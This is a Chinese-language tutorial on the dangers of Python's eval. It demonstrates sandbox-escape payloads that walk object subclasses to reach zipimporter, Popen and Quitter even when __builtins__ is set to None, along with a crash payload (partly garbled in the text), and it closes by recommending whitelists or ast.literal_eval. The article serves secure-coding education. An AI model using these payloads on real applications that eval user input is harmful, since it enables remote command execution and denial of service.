0x00 前言

eval是Python用于執(zhí)行python表達(dá)式的一個(gè)內(nèi)置函數(shù)，使用eval，可以很方便的將字符串動(dòng)態(tài)執(zhí)行。比如下列代碼：

>>> eval("1+2")
>>> eval("[x for x in range(10)]")
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]

當(dāng)內(nèi)存中的內(nèi)置模塊含有os的話，eval同樣可以做到命令執(zhí)行：

>>> import os
>>> eval("os.system('whoami')")
win-20140812chj\administrator

當(dāng)然，eval只能執(zhí)行Python的表達(dá)式類型的代碼，不能直接用它進(jìn)行import操作，但exec可以。如果非要使用eval進(jìn)行import，則使用 __import__ ：

>>> exec('import os')
>>> eval('import os')
Traceback (most recent call last):
 File "<stdin>", line 1, in <module>
 File "<string>", line 1
  import os
     ^
SyntaxError: invalid syntax
>>> eval("__import__('os').system('whoami')")
win-20140812chj\administrator

在實(shí)際的代碼中，往往有使用客戶端數(shù)據(jù)帶入eval中執(zhí)行的需求。比如動(dòng)態(tài)模塊的引入，舉個(gè)栗子，一個(gè)在線爬蟲(chóng)平臺(tái)上爬蟲(chóng)可能有多個(gè)并且位于不同的模塊中，服務(wù)器端但往往只需要調(diào)用用戶在客戶端選擇的爬蟲(chóng)類型，并通過(guò)后端的exec或者eval進(jìn)行動(dòng)態(tài)調(diào)用，后端編碼實(shí)現(xiàn)非常方便。但如果對(duì)用戶的請(qǐng)求處理不恰當(dāng)，就會(huì)造成嚴(yán)重的安全漏洞。

0x01 “安全”使用eval

現(xiàn)在提倡最多的就是使用eval的后兩個(gè)參數(shù)來(lái)設(shè)置函數(shù)的白名單：

Eval函數(shù)的聲明為 eval(expression[, globals[, locals]])

其中，第二三個(gè)參數(shù)分別指定能夠在eval中使用的函數(shù)等，如果不指定，默認(rèn)為globals()和locals()函數(shù)中 包含的模塊和函數(shù)。

>>> import os
>>> 'os' in globals()
True
>>> eval('os.system(\'whoami\')')
win-20140812chj\administrator

>>> eval('os.system(\'whoami\')',{},{})
Traceback (most recent call last):
 File "<stdin>", line 1, in <module>
 File "<string>", line 1, in <module>
NameError: name 'os' is not defined

如果指定只允許調(diào)用abs函數(shù)，可以使用下面的寫(xiě)法：

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
>>> eval('os.system(\'whoami\')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
 File "<stdin>", line 1, in <module>
 File "<string>", line 1, in <module>
NameError: name 'os' is not defined
>>> eval('os.system(\'whoami\')')
win-20140812chj\administrator

使用這種方法來(lái)防護(hù)，確實(shí)可以起到一定的作用，但是， 這種處理方法可能會(huì)被繞過(guò) ，從而造成其他問(wèn)題！

0x02 繞過(guò)執(zhí)行代碼1

被繞過(guò)的情景如下，小明知道了eval會(huì)帶來(lái)一定的安全風(fēng)險(xiǎn)，所以使用如下的手段去防止eval執(zhí)行任意代碼：

env = {}
env["locals"]  = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
eval(users_str, env)

Python中的 __builtins__ 是內(nèi)置模塊，用來(lái)設(shè)置內(nèi)置函數(shù)的模塊。比如熟悉的abs，open等內(nèi)置函數(shù)，都是在該模塊中以字典的方式存儲(chǔ)的，下面兩種寫(xiě)法是等價(jià)的：

>>> __builtins__.abs(-20)
>>> abs(-20)

我們也可以自定義內(nèi)置函數(shù)，并像使用Python中的內(nèi)置函數(shù)一樣使用它們：

>>> def hello():
...   print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi

小明將eval函數(shù)的作用域中的內(nèi)置模塊設(shè)置為 None ，好像看起來(lái)很徹底了，但依然可以被繞過(guò)。 __builtins__ 是 __builtin__ 的一個(gè)引用，在 __main__ 模塊下，兩者是等價(jià)的：

>>> id(__builtins__)
>>> id(__builtin__)

根據(jù) 烏云drops 提到的方法，使用如下代碼即可：

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

上面的代碼首先利用 __class__ 和 __subclasses__ 動(dòng)態(tài)加載了 object 對(duì)象，這是因?yàn)閑val中無(wú)法直接使用object。然后使用object的子類的zipimporter對(duì)egg壓縮文件中的configobj模塊進(jìn)行導(dǎo)入，并調(diào)用其內(nèi)置模塊中的os模塊從而實(shí)現(xiàn)命令執(zhí)行，當(dāng)然，前提是要有configobj的egg文件。 configobj模塊很有意思，居然內(nèi)置了os模塊：

>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chj\administrator

和configobj類似的模塊如 urllib ， urllib2 ， setuptools 等都有os的內(nèi)置，理論上使用哪個(gè)都行。 如果無(wú)法下載egg壓縮文件，可以下載帶有setup.py的文件夾，加入：

from setuptools import setup, find_packages 

然后執(zhí)行:

python setup.py bdist_egg

就可以在dist文件夾中找到對(duì)應(yīng)的egg文件。 繞過(guò)demo如下：

>>> env = {}
>>> env["locals"]  = None
>>> env["globals"] = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chj\administrator

>>> eval(users_str, {}, {})
win-20140812chj\administrator

0x03 拒絕服務(wù)攻擊1

object的子類中有很多有趣的東西，執(zhí)行以下代碼查看：

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

這里我就不輸出結(jié)果了，如果你執(zhí)行的話，可以看到很多有趣的模塊，比如file，zipimporter，Quitter等。經(jīng)過(guò)測(cè)試，file的構(gòu)造函數(shù)是被解釋器沙箱隔離的。 簡(jiǎn)單的，或者直接使object暴露出的子類Quitter進(jìn)行退出：

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
 == 'Quitter'][0](0)()", {'__builtins__':None})

C:/>

如果運(yùn)氣好，遇到對(duì)方程序中導(dǎo)入了 os 等敏感模塊，那么Popen就可以用，并且繞過(guò) __builins__ 為空的限制，栗子如下：

>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
<subprocess.Popen object at 0x0324FF70>
>>>
正在 Ping 127.0.0.1 具有 32 字節(jié)的數(shù)據(jù):
來(lái)自 127.0.0.1 的回復(fù): 字節(jié)=32 時(shí)間<1ms TTL=64
.0.0.1 的 Ping 統(tǒng)計(jì)信息:
  數(shù)據(jù)包: 已發(fā)送 = 1，已接收 = 1，丟失 = 0 (0% 丟失)，
往返行程的估計(jì)時(shí)間(以毫秒為單位):
  最短 = 0ms，最長(zhǎng) = 0ms，平均 = 0ms
>>>

事實(shí)上，這種情況非常多，比如導(dǎo)入os模塊，一般用來(lái)處理路徑問(wèn)題。所以說(shuō)，遇到這種情況，完全可以列舉大量的功能函數(shù)，來(lái)探測(cè)目標(biāo)object的子類中是否含有一些危險(xiǎn)的函數(shù)可以直接使用。

0x04 拒絕服務(wù)攻擊2

同樣，我們甚至可以繞過(guò) __builtins__ 為None，造成一次拒絕服務(wù)攻擊，Payload(來(lái)自老外blog)如下：

>>> eval('(lambda fc=(lambda n: .__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

運(yùn)行上面的代碼，Python直接crash掉了，造成拒絕服務(wù)攻擊。 原理是通過(guò)嵌套的lambda來(lái)構(gòu)造一片代碼段，即code對(duì)象。為這個(gè)code對(duì)象分配空的棧，并給出相應(yīng)的代碼字符串，這里是 KABOOM ，在空棧上執(zhí)行代碼，會(huì)出現(xiàn)crash。構(gòu)造完成后，調(diào)用fc函數(shù)即可觸發(fā)，其思路不可謂不淫蕩。

0x05 總結(jié)

從上面的內(nèi)容我們可以看出，單單將內(nèi)置模塊置為空，是不夠的，最好的機(jī)制是構(gòu)造白名單，如果覺(jué)得比較麻煩，可以使用 ast.literal_eval 代替不安全的 eval 。

以上就是本文關(guān)于Python中eval帶來(lái)的潛在風(fēng)險(xiǎn)代碼分析的全部?jī)?nèi)容，希望對(duì)大家有所幫助。感興趣的朋友可以繼續(xù)參閱本站其他相關(guān)專題，如有不足之處，歡迎留言指出。感謝朋友們對(duì)本站的支持！

最新評(píng)論